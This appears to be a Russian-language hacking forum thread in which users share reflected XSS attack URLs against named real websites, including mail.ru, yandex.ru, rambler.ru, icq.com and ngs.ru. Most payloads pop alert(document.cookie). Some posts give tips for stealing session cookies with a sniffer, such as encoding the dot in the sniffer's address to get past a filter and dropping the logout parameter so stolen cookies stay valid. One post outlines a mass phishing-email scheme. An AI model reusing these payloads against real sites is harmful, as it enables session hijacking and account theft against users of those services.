XSS на юкозe (работает только у авторизованных админов сайта) Не почтовый сервер, просто не нашел куда засунуть его
Пассивная xss на ngs.ru Code: http://expert.ngs.ru/search/?q=%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&t=1&r=0
Code: http://www.google.com.ua/imgres?imgurl=http://gogole.com&imgrefurl=[color="Red"]IFRAME_HERE[/color]&h=254&w=340&sz=15D0%25B8%25D1%2582%25D0%25B1%25D1%2583%25D0%25BB%25D1%258C%25D1%2582%25D0%25B5%25D1%2580%25D1%258C%25D0%25B5%25D1%2580&hl=ru&usg=__UzxB7H_92zpHrCDSG-bR5itVNg4=&ei=Lk7fSvurCI-lsAbN0_GlDg&sa=X&oi=image_result&resnum=4&ct=image&ved=0CAwQ9QEwAw IFRAME
хм... никогда этим не занимался. To Code: http://calendar.yandex.ru/event-add?show_date=2009-10-22&view_type=%22%27%3E%3Cscript%3Ealert%28%27Irdis%27%29%3C/script%3E
По поводу этой штуки работает многоходовка, да и работает ли...? Отсылаем мыло. В мыле img на вашем сайте, который запустит скажем php скрипт который узнает рефер (id письма) и вышлет еще одно письмо. С ссылкой XSS на первое письмо.... Даже если первое письмо удалят, оно валяется в удаленных и все равно сработает, т.к. второе письмо прилетит как только откроют перовое... НО надо ведь, что бы первое письмо открыли, а во втором письме прошли по ссылке конечно если разослать миллиону товарищей то возможно эффект будет... ЗЫ Совсем забыла, XSS работает если в письме есть вложение.
пассивка на mаil.ru, работает только у авторизованных пассивка на mаil.ru, точку в адресе сниффера ставить в урл уникоде, иначе фильтр может заменить точку в урл на нижнее подчеркивание
такой вариант годится? http://job.ukr.net/personal/resume/new/?event=Add&Photo%5Bthmb%5D=&Photo%5Bfull%5D="><img src=foo.png onerror=alert(document.cookie) />&RegionId=0&AgreementConfirm=1
http://soft.mail.ru/s_result_softclub.php?qs=1&words=%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E в фильтре есть дырка ... кто сможет реадизовать ?
так гораздо лучше http://11x11.mail.ru/?&url="><script>alert(document.cookie)</script> запрос do=logout в ссылке означает выход из почтового ящика, а мы знаем, что кукисы умирают, как только нажмешь Выход, поэтому последние строки do=logout из ссылки убери, иначе сохранять будешь мертвые кукисы....
http://search.icq.com/search/img_results.php?q=%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&ch_id=%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%28/Ruslan1817/%29%3C/script%3E
Yandex XSS: http://mail.yandex.ru/classic/abook_person?ids=1\');'>');}</script><script>alert()</script> Вот ещё кучка XSS, которые я где-то выкладывал, что-то уже нерабочее: Code: http://rutube.ru/search.html?search=sum41&sort_by=1"><script>alert( 'XSS')</script>&category=1 http://help.rambler.ru/feedback.html?s=7715&fio="><script>alert('XSS')</script> http://horoscopes.rambler.ru/fortune.html?sec=56576"><script>alert('XSS')</script> http://story.travel.mail.ru/?mod=add_story&back="><script>alert(document.cooki e)</script> http://miss.rambler.ru/srch/?sort=0&set=miss&words="><script>alert(document.co okie)</script> http://skate.rambler.ru/popup.html?alt=</title><script>alert(document.cookie)</script> http://www.pisem.net/download.php/?file="><script>alert('XSS')</script> http://sub.rambler.ru/catalog/rambler/news/?login="><script>alert('XSS')</script> http://health.rambler.ru/drugs/pharmacy.html?phid=37"><script>alert('XSS')</script> http://foto.rambler.ru/introduce.htm...)%3C/script%3E http://uptime.ru/downtime.php?host_id="><script>alert()</script>" http://www.speedguide.net/read_articles.php?id="><script>alert()</script>" http://mail.yandex.ru/r?url=javascript:alert();
http://foto.rambler.ru/introduce.html?back='%3E%3C''%3E%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://planeta.rambler.ru/community/community/?tags=4049740'%3E%3C''%3E%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Заходим сюда --->http://rasp.yandex.ru/widgets/route?station_from=9623562&station_to=9600215&thread=YUT376A_agent&dateForward=2009-12-22 Видем внизу Текст: -«Вылетаю!» -«Встречайте!» -написать свой текст <---- он нам и нужен Вставляем туда ---> <IMG SRC=" javascript:alert('XSS');"> ----> жмем получить код ---> потом выбераем любую из них «Вылетаю!» , «Встречайте!» и снова жмем обратно ( где скрипт ) и вот она долгожданная "XSS" ))
http://afisha.mail.ru/resto_list.html?advs=1&name=&%22%3E%3Cimg%20src=foo.png%20onerror=alert(document.cookie)%20/%3E
http://afisha.mail.ru/event.html?placetype=3&%22%3E%3Cimg%20src=foo.png%20onerror=alert(document.cookie)%20/%3E